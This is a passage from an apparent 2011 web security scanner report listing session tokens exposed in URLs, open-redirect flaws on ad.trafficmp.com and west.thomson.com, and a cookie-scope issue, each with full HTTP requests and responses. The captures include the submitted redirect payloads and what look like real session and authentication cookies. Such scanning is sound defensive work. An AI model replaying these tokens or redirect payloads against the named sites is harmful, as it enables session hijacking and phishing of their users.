GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target&currencyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 146
Date: Tue, 26 Apr 2011 20:59:08 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferDefault()).loaded();}

11.18. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://p.widgetserver.com
Path:   /p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /p/fetch/origin==http%3A%2F%2Ftwitter.com%2Fstatuses%2Fuser_timeline%2Faidswalkboston.atom?token=095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168 HTTP/1.1
Host: p.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=48916
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=900,public
Content-Type: application/atom+xml;charset=utf-8
Date: Tue, 26 Apr 2011 21:44:45 GMT
Last-Modified: Tue, 26 Apr 2011 21:34:14 GMT
Server: ECS (dca/5338)
X-Cache: HIT
Content-Length: 21241

<?xml version="1.0" encoding="UTF-8"?>
<feed xml:lang="en-US" xmlns:georss="http://www.georss.org/georss" xmlns="http://www.w3.org/2005/Atom" xmlns:twitter="http://api.twitter.com">
<title>Twitter /
...[SNIP]...

11.19. http://p.widgetserver.com/p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://p.widgetserver.com
Path:   /p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /p/fetch/origin==http%3A%2F%2Fwww.facebook.com%2Ffeeds%2Fpage.php%3Fformat%3Datom10%26id%3D95922227750?token=095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168 HTTP/1.1
Host: p.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://cdn.widgetserver.com/syndication/flash/blidget/blidget.swf?cb=48916
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=900,public
Content-Type: application/atom+xml
Date: Tue, 26 Apr 2011 21:45:03 GMT
Last-Modified: Tue, 26 Apr 2011 21:45:03 GMT
Server: ECS (dca/533B)
X-Cache: HIT
Content-Length: 45545

<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:activity="http://activitystrea.ms/spec/1.0/" xmlns:fb="http://www.facebook.com" xmlns:access="http://www.blogline
...[SNIP]...

11.20. http://sales.liveperson.net/hc/18987408/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/18987408/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/18987408/?&visitor=16601209214853&msessionkey=9076152492534536021&site=18987408&cmd=mTagStartPage&lpCallId=71075537475-113457939820&protV=20&lpjson=1&page=http%3A//advertising.microsoft.com/home%3Fs_cid%3Dus_msn_footer&id=6391686124&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-adcenter-us-english&activePlugin=none&cobrowse=true&PV%21unit=adcenter-us&PV%21visitorActive=1&SV%21language=english&SV%21pageNameS=Home%3APage1%3Aen-us&title=Online%20Advertising%20for%20Marketers%20and%20Publishers--Microsoft%20Advertising&referrer=http%3A//www.myhomemsn.com/&cobrowse=true&cookie=A%3DI%26I%3DAxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w%21%21%26M%3D1%3B%20MUID%3DB506C07761D7465D924574124E3C14DF%3B%20MC1%3DGUID%3D845eef4a7ff18745a494666b76292718%26HASH%3D4aef%26LV%3D20114%26V%3D3%3B%20msdn%3DL%3D1033%3B%20ixpLightBrowser%3D0%3B%20MSID%3DMicrosoft.CreationDate%3D04/19/2011%2011%3A23%3A33%26Microsoft.LastVisitDate%3D04/23/2011%2014%3A01%3A21%26Microsoft.VisitStartDate%3D04/23/2011%2013%3A49%3A08%26Microsoft.CookieId%3D64491e77-08ce-4e1f-9bac-3648a81416de%26Microsoft.TokenId%3Dffffffff-ffff-ffff-ffff-ffffffffffff%26Microsoft.NumberOfVisits%3D6%26Microsoft.CookieFirstVisit%3D1%26Microsoft.IdentityToken%3DAA%3D%3D%26Microsoft.MicrosoftId%3D0253-8586-9443-3504%3B%20WT_NVR_RU%3D0%3Dtechnet%7Cmsdn%3A1%3D%3A2%3D%3B%20omniID%3D1303134620609_e49b_0c9c_6cf1_45f64f5a5361%3B%20WT_FPC%3Did%3D173.193.214.243-2082981296.30145999%3Alv%3D1303649894761%3Ass%3D1303649859266%3B%20ExternalOmnitureTrackingCode%3Dus_msn_footer%3B%20MarketToggleRenderMethod%3DSTATICADVERTISING.MICROSOFT.COM%3B%20s_cc%3Dtrue%3B%20s_campaign%3Dus_msn_footer%3B%20s_p12%3Dus_msn_footer%3B%20s_nr%3D1303843507025-Repeat%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20_opt_vi_DANG4OLL%3D2A807526-0B45-4F67-8001-CE6244FF15CF%3B%20_opt_vs_DANG4OLL%3D2A807526-0B45-4F67-8001-CE6244FF15CF%3B%20_opt_vt_DANG4OLL%3D1E6DD0F02C%3B%2018987408-VID%3D16601209214853%3B%2018987408-SKEY%3D9076152492534536021%3B%20HumanClickSiteContainerID_18987408%3DSTANDALONE HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://advertising.microsoft.com/home?s_cid=us_msn_footer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=9076152492534536021; HumanClickSiteContainerID_18987408=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303834849435

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_18987408=STANDALONE; path=/hc/18987408
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 18:45:35 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"71075537475-113457939820","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

11.21. http://www.aac.org/site/TR/Events/AWB08  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.aac.org
Path:   /site/TR/Events/AWB08

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 HTTP/1.1
Host: www.aac.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:44:06 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=839fd626r1.app209a; path=/
Content-Type: text/html
Content-Length: 26372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<base href="http://www.aac.org/site/" />


<title>AIDS Walk Boston, Sunday, June 5, 2011: </title>
<meta http-equiv="C
...[SNIP]...
<th>Team Freddie Mercury - <a class="lc_lighterLink" href="https://secure2.convio.net/aac/site/TRR/Events/AWB08?JServSessionIdr004=839fd626r1.app209a&amp;fr_tjoin=24880&amp;pg=tfind&amp;fr_id=1110">Join Team</a>
...[SNIP]...
<td class="cstmBtnBack" align = "center">

<a class="cstmBtnText" href="https://secure2.convio.net/aac/site/Donation2?df_id=2184&PROXY_ID=24880&PROXY_TYPE=22&FR_ID=1110&JServSessionIdr004=839fd626r1.app209a">Support Team Freddie Mercury!</a>
...[SNIP]...
</dl>

<a href="https://secure2.convio.net/aac/site/Donation2?df_id=2184&PROXY_ID=24880&PROXY_TYPE=22&FR_ID=1110&JServSessionIdr004=839fd626r1.app209a" title="Make a gift to support Team Freddie Mercury">
Make a gift!
</a>
...[SNIP]...

11.22. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.computerworld.com
Path:   /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Tue, 26 Apr 2011 22:00:36 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLWLQSPYV"
Vary: Accept-Encoding
Cache-Control: public, max-age=521
Expires: Tue, 26 Apr 2011 22:00:49 GMT
Date: Tue, 26 Apr 2011 21:52:08 GMT
Connection: close
Content-Length: 134301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
</script>
       <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

11.23. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_03_0_900294%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_03_0_900294&sId=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_03_0_900294&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.229.45
X-Cnection: close
Date: Tue, 26 Apr 2011 18:38:54 GMT
Content-Length: 0


11.24. http://www.widgetserver.com/syndication/get_widget.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.widgetserver.com
Path:   /syndication/get_widget.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /syndication/get_widget.html?widget.appId=077f25c8-0348-4215-9539-57b2ff17f13b&widget.regId=621004a9-a717-4271-bd6a-b454b74a1d68&widget.friendlyId=BadgeRotatorPro2000&widget.name=site%20gallery%20badge%20rotator&widget.token=0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74&widget.sid=5b63bffcc071385c2a7b4c84f1e51a7f&widget.vid=5b63bffcc071385c2a7b4c84f1e51a7f&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Flist%2Fmost_popular&widget.timestamp=1303854391728&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=0&widget.width=300&widget.height=70&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=BRH&widget.prototype=NONE&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=15&widget.output=htmlcontent HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/list/most_popular
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:47:06 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sun, 7 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 4257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>site galle
...[SNIP]...

11.25. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.widgetserver.com
Path:   /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830 HTTP/1.1
Host: www.widgetserver.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.widgetbox.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 2054

siteConfig=%7B%22icon%22%3A%22%22%2C%22phoneIcon%22%3A%22%22%2C%22tabletIcon%22%3A%22%22%2C%22startupImg%22%3A%22%22%2C%22tabletStartupImg%22%3A%22%22%2C%22headerImg%22%3A%22%22%2C%22navStyle%22%3A%22
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:47:39 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sun, 7 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-UA-Compatible: chrome=1
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15116

<!DOCTYPE html>
<html>
<head>
<title>New App</title>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"/>
<meta name="apple-mobile-web-app-capab
...[SNIP]...

12. Open redirection  previous  next
There are 2 instances of this issue:


12.1. http://ad.trafficmp.com/a/bpix [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a553a9843e836a584/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /a/bpix?adv=652&id=1561&format=image&r=http%3a//a553a9843e836a584/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_1yvt=jxb%3Aafuq%3A1; rth=2-ljzkpb-jxb~afuq~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 26 Apr 2011 20:46:33 GMT
Location: http://a553a9843e836a584/a?
Connection: close
Set-Cookie: T_1yvt=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_uuk=jxb%3Aah0b%3A1; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:46:34 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-jxb~ah0b~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Wed, 25-Apr-2012 20:46:34 GMT; Path=/
Content-Length: 0


12.2. http://west.thomson.com/Register/CreateTransferToken.aspx [ReturnUrl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /Register/CreateTransferToken.aspx

Issue detail

The value of the ReturnUrl request parameter is used to perform an HTTP redirect. The payload http%3a//a1a5b9bd6bfb8fd5d/a%3fhttps%3a//myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn%3fReturnUrl%3dhttp%3a//myaccount.west.thomson.com/MYACCOUNT/default.aspx%3fReturnUrl%3d/MyAccount/Common/Landing/MyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless was submitted in the ReturnUrl parameter. This caused a redirection to the following URL:

Request

GET /Register/CreateTransferToken.aspx?ReturnUrl=http%3a//a1a5b9bd6bfb8fd5d/a%3fhttps%3a//myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn%3fReturnUrl%3dhttp%3a//myaccount.west.thomson.com/MYACCOUNT/default.aspx%3fReturnUrl%3d/MyAccount/Common/Landing/MyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=FDCDD3CCDE1E864402B9FC99C17C5B887E4F142C7E539940508F9F7479A6A6F433A5B1298DA99CBBD01CC94400DE585D91C0BC2044A5DA3945B77A521C66DF4338A0F22A9AE831BC4D28B1B360FFA8BC5F7FEFCCCD8455667134A5A3C8102426B33E2E3C145412DD2FC7BAE2D1CF511058AF4AC6C8158E791D929260CFD17BFDF9A91806384EB9892622A5C4D4B2F99ACA7BB96849E4E1F35EDDBE997CF3F1A087FAD644670217520402D18C4C7DC1B3E409FCCFD1749D5356AF72C2DE92A54626B4737812FE5F26773127B302BF70BC002DA3B3EDC640107FA24DBEFD453411A2E9878D

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:14:17 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: http://a1a5b9bd6bfb8fd5d/a?https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken=
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=482E7AE524DA1F3F2A28FCD620DC558FA8566C6CB61941FAFC1CB70EF3C2FA21E7D38A68F49C1B803B1B567BE0C9891A334C00CE10565E0DD1C8CCEFE86E92AD19064B187DF6C5F804FD763E2DB07DD422DABCD9BF70AC3114C770033463A55C91BC79C3E9A4622BEB5707849259AD42E88BD0AE2E6EF20190BC3C89DFD08FBCDAC1288AB0E7450E6D764ECE7FB8D8BE5E4EFD31E0573F33E361E3C42DCA6177D73B0C382E70870F2D578A80B1073193DCABCE0D8FB750E29E54F28C17A99337FD2AF6CFB79DD7CE2FCC341DC3A102D3D664674CAD85CB15B43A586793EACBAE8D982240; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 516

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://a1a5b9bd6bfb8fd5d/a?https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=
...[SNIP]...

13. Cookie scoped to parent domain  previous  next
There are 108 instances of this issue:


13.1. https://secure.bundle.com/services/nocache/Membership/UpdateAuthenticationStateToClient  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bundle.com
Path:   /services/nocache/Membership/UpdateAuthenticationStateToClient

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/nocache/Membership/UpdateAuthenticationStateToClient HTTP/1.1
Host: secure.bundle.com
Connection: keep-alive
Referer: https://secure.bundle.com/msn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
